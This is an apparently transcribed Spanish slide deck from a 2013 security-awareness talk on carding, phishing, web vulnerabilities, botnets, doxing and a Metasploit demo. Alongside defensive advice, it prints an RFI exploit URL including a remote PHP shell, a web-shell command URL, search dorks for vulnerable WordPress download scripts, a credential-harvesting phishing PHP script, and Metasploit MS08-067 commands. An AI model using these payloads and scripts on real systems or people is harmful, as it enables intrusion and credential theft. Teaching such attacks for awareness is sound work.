más responsabilidad y seguridad en tus datos
TRANSCRIPT
16-Feb-13WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 1
Mas responsabilidad y mas seguridad en tus datos |
| Seguridad INFORMATICA
WWW.WEBSEC.ESWWW.CIBERENCUENTROS.ES
PRESENTACION:
16-Feb-13WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 2
• Me llamo Jorge
• Me dedico a la seguridad informatica.
• Mi web personal es [WEBSEC.ES]
• Mi correo es [email protected]
• Quantika14
MÁS RESPONSABILIDAD Y SEGURIDAD EN TUS
DATOS
16-Feb-13WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 3
• Para ser mas seguros tenemos que ser conscientes del medio que nos rodea.
• Para tener seguridad tenemos que saber nuestros sitios más débiles.
• Para ser mas responsable tenemos que saber el valor de nuestros datos y que daño
pueden causar en terceras manos.
• Para ser un usuario responsable y seguro con sus datos tiene que saber como se
realizan ataques y hasta donde se puede llegar.
• Un usuario que sepa entrar en un windows xp no lo pondrá en su negocio o en su casa.
No le pondrá a su hijo un equipo vulnerable. No tendrá contraseñas débiles. Actualizara y
será responsable y prudente con sus datos y en sus sistemas.
• Y el saber no ocupa lugar y saber esto es cada día más importante.
¿QUÉ VAMOS A DAR?
16-Feb-13WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 4
1. Definiciones
2. Fraude Online
CARDING
Phishing
Pharming
3. ¿Qué son las Botnets?
4. ¿Qué es el Doxing?
5. Prueba AutoPwn + Nmap
DEFINICIONES
16-Feb-13WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 5
• IP: Etiqueta numérica que identifica a un sistema en la red de manera unívoca.
• DNS: Domain Name Service. Servicio de resolución de dominios. Traduce dominios a direcciones IP.
• Virus: Software generalmente malicioso con capacidad de replicación y/o infección de
ficheros.
• Base de Datos(DB): conjunto de datos, clasificados por tablas,
columnas y registros. Aplicaciones PostgresSQL, MYSQL
• Host: Maquina conectada en un red y utiliza o da servicios.
• Puerto: es el valor que se usa, en el modelo de la capa de transporte, para distinguir entre las múltiples aplicaciones que se pueden conectar al mismo host. Ejemplo 80 HTTP.
FRAUDE ONLINE – ME LO
LLEVO- YO NO SOY TONTO
CARDING &
PHISHING
16-Feb-13WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 6
¿QUÉ ES EL PHREAKING?
16-Feb-13WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 7
Constante estudio de las redes telefónicas y sus ramas, para la personificación, modificación, creación de sistemas, accesos no autorizados etc.
Podemos separar el phreaking en 2 ramas principales:
- Redes telefónicas. (Phreak clásico)- Aparatos telefónicos. (Phreak contemporáneo)
Redes telefónicas :Se trabaja con las redes y distintas compañías, buscando y encontrando bugs y como explotarlos. (Como la conocida Caja Azul o lo que nos enseño nuestro querido Capitán Crunch)
Aparatos telefónicos:Se trabaja con todo aparato telefónico, no solo móviles, sino teléfonos fijos, micrófonos y todo su cableado. El fin de un Phreak es el mismo que un ingeniero de redes telefónicas, conocer todo el funcionamiento de los sistemas para encontrar errores y vulnerabilidades.
John Draper o Capitán Crunch
• Leyenda Hacker
• Años 70, el tenia 27 años.
• La empresa Quaker Oaks comercializa
cereales ―Cap’n Crunch‖.
• En ella había un regalo, un silbato azul.
• Si tapaba con pegamento un agujero
emitía 2600 Hz.
• Construyo la ―caja azul‖, un dispositivo
capaz de reproducir el resto de tonos.
• El primer prototipo de APPLE fue
financiado con el dinero que
conseguían vendiendo las cajas azul,
Steve Jobs, Steve Wozniak y John.
16-Feb-13WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 8
HISTORIA SECRETA DE LOS HACKERS
INFORMÁTICOS
16-Feb-13WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 9
http://www.youtube.com/watch?v=oloOmqOCXN4
CARDING
16-Feb-13WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 10
• ¿Qué es?: Es el uso ilegitimo de las tarjetas de crédito de otras personas.
• Estructura de las tarjetas de crédito:
1. Son 16 dígitos divididos en 4 grupos de 4 dígitos. Del 0 al 9.
2. Los 4 primeros determinan el banco.
3. ->American Express (15 dígitos)
->VISA (13 o 16 dígitos)
->Mastercard (16 dígitos)
->Discover (16 dígitos)
¿SOMOS MALOS?
16-Feb-13WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 11
• ¿Qué necesitamos?
1. Una Shell PHP en un servidor.
2. Una Fake.
3. Una lista de correos.
4. Un correo robado.
¿QUIERO MI SERVIDOR? =)
16-Feb-13WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 12
• Proceso de Footprinting.
• Análisis de vulnerabilidades.
• Explotación de vulnerabilidades.
• Generación de informe… no!!!, tenemos que pensar como un maligno.
• Subir Shell.
FOOTPRINTING
16-Feb-13WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 13
• GOOGLE HACKING (―inurl:‖, ―filetype:sql‖…)
• Herramientas que automaticen ―Anubis‖.
• Leer el código fuente!!!
• Errores 404
• IP reverse.
• Cuwhois, robtex.
• Metadatos.
• GoLismero - enlaces.
• Aplicación en python
• Muestra todos los enlaces de una
web.
• Puede guardar los resultados.
• Detectar vulnerabilidades.
GOLISMERO
16-Feb-13WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 14
VULNERABILIDADES
16-Feb-13WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 15
• Inyección SQL.
• XSS - Cross Site Scripting(persistente o reflejada).
• Persistente: inyecta código (script, iframe) maligno.
• Reflejada: modifica valores de la web que utiliza para variables. Robo de Cookies.
• RFI (inclusión remota de archivos)
• LFI (Local file inclusion)
• FPD (Full Puth Disclosure Vulnerability)
INYECCIÓN SQL
16-Feb-13WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16
• En el nivel de validación de las entradas para realizar consultar a una base de datos no
verifica o filtra bien. Y podemos inyectar código malicioso.
• Podemos escalar privilegios.
• Podemos sacar las tablas, columnas y registros de la base de datos.
TOOLS INYECCIÓN SQL
16-Feb-13WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 17
RFI - INCLUSIÓN REMOTA DE ARCHIVOS
16-Feb-13WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 18
• Es posible debido aun error en la programación PHP, que hace que la web cargue un
determinado archivo que está contenido en una variable.
• <? include($_GET[’variable’]); ?>
• Dorks:
• inurl:/index.php?include=
• inurl:/index.php?pagina=
• Explotanción:
• http://<server>/typetest/index.php?link=http://<server>/<shellphp>
LFI – LOCAL FILE INCLUSIÓN
16-Feb-13WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 19
• Ejecutar código externo en la web victima.
• Subiendo un archivo malicioso a la misma.
• Nosotros usaremos una PHP SHELL.
• Digamos que LFI es que recibe un valor de entrada que recoge la variable cmd y es
ejecutado en el sistema mediante la llamada system de PHP.
• Podemos arreglarlo deshabilitando la llamada al sistema system en PHP
• Ejmplo:
• http://www.owned.com/imag/shell.php?cmd=ls
XSS - CROSS SITE SCRIPTING
16-Feb-13WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 20
• Usualmente no se validan correctamente los datos de entrada que son usados en
algunas aplicaciones permitiendo enviar un script malicioso a la aplicación.
• Para funcionar necesitan un punto de entrada, que suelen ser los formularios.
• A través de un ataque XSS, se puede secuestrar cuentas, cambiar
configuraciones de los usuarios, acceder a partes restringidas del sitio, modificar
el contenido del sitio, etc.
<html>
<body>
<h1>Ejemplo 1</h1>
<form action='ejemplo1-2.php' method='post'>
<center><h1><b>Elige tu sistema favorito</b></h1></center><br>
<input type="radio" name="os" value="Linux">Linux<br>
<input type="radio" name="os" value="Windows">Windows<br>
<input type="radio" name="os"value="MacOS">MacOs<br>
<center><input type="submit"value="enviar"></center>
</form>
</body>
</html>
• <?
• $Choice = $_REQUEST[os];
• ?>
• <html>
• <head><TITLE>Ejemplo XSS</TITLE></head>
• <body>
• <br>
• <center>
• <h1>Elegiste: <? echo $Choice?></h1>
• </center>
• </body>
• </html>
XSS - CROSS SITE SCRIPTING
EJEMPLO 1.
16-Feb-13WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 21
• Solución:
• $Choice = htmlentities($_REQUEST[OS]);
• <?
• $Choice = htmlentities($_REQUEST[OS]);
• ?>
• <html>
• <head><TITLE>Ejemplo XSS</TITLE></head>
• <body>
• <br>
• <center>
• <h1>Elegiste: <? echo $Choice?></h1>
• </center>
• </body>
• </html>
Solución
htmlentities —
Convierte todos
los caracteres
aplicables a
entidades HTML
16-Feb-13WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 22
• Permite la descarga de archivos php
de la plataforma poniéndola en
peligro. Imaginaros descargar el "wp-
config" del cms donde se encuentra
toda la configuración a la base de
datos de nuestra web.
• DORKS:
• inurl:download.php?download_file= &
inurl:wp-content
• inurl:download.php?&path= & inurl:wp-
content
codigo de download.php:
• <? $download_file = $_GET['download_file'];
• $split_file = xplode('/',$download_file);
• $split_file_num = count($split_file);
• $my_section = $split_file_num-1;
• $download_file_name = $split_file[$my_section]; header ("Content-type: octet/stream");
• header ("Content-disposition:
• attachment;
• filename=".$download_file_name.";")
• ; header('Content-type: application/pdf');
• header("Content-Length:
• ".filesize($download_file)); readfile($download_file); exit; ?>
WORDPRESS VULN
16-Feb-13WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 23
¿QUÉ ES UNA BOTNET?
16-Feb-13WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 24
UNA BOTNET:
16-Feb-13WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 25
• Es una colección de software robots.
• Son maquinas infectadas que realizan acciones en conjunto de una manera centralizada.
• El artífice de la botnet puede controlar todos las maquinas infectadas de una forma
remota.
• IRC, HTTP. Incluso por SMS…
MEDIDAS PREVENTIVAS
16-Feb-13WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 26
• Usa un firewall.
• Usa un antivirus.
• Instala programas que sólo provengan de fuentes fiables.
• Evita abrir ejecutables de correos.
• Actualiza tu sistema y programas.
• Cuidado con los fakes o scams.
• Cuidado con dispositivos de almacenamiento externos.
• No activar el auto ejecutar de las descargas de los navegadores.
• Ser prudente y precavido.
ESTAMOS EN UNA BOTNET???
16-Feb-13WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 27
• Usa el comando ―netstat‖: netstat –naconexiones entrantes
• Si el internet te va lento. Examina el trafico.
• Pasa un antivirus.
• Formatea.
¿QUÉ ES UN FAKE?
16-Feb-13WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 28
• Es una web clon de una pagina oficial con la intención
de robar los datos de un login (usuario, password, pin,
credenciales, etc)
• Es una técnica de phishing. Suelen engañarnos
atreves de correos o desde las redes sociales,
utilizando la ingeniería social.
EJEMPLO DE FAKE 1
16-Feb-13WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 29
EJEMPLO DE FAKE 2
16-Feb-13WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 30
DETRÁS EN PHP
16-Feb-13WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 31
• <?php
• $login=$_POST["nombre"];
• $pass=$_POST["password"];
• $guardar = fopen("pass.txt",a); // funcion fopen abre el archivo pass.txt
• /* La funcion fopen tiene diferentes modos a= abre el archivo solo cuando se escribe, a+=abre el archivo cuando se lee y se escribe*/
• fwrite($guardar,"
• usuario: ".$login."
• password: ".$pass);
• fclose($guardar); //cierra fopen
• echo "<META HTTP-EQUIV='refresh' CONTENT='1; url=http://websec.es'>";
• ?>
16-Feb-13WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 32
• Es el proceso de obtención de información acerca de una persona a través de fuentes de internet.
• Deriva de ―Document‖ y ―ing‖; documentando.
• El sujeto o entidad de la búsqueda y revelación de datos e información es ―TARGET‖
• El doxer para encontrar toda la información posible es incluso de entrar en base de datos gubernamentales o viajar a la ciudad del objetivo.
¿QUÉ ES EL DOXING?
16-Feb-13WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 33
METASPLOIT INTRUSIÓN WINDOWS XP SP3
NETAPI
16-Feb-13WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 34
• use windows/smb/ms08_067_netapi
• Show options
• Set RHOST ―ipvictima‖
• set payload windows/vncinject/bind_tcp
• Set lport 4444
• EXPLOIT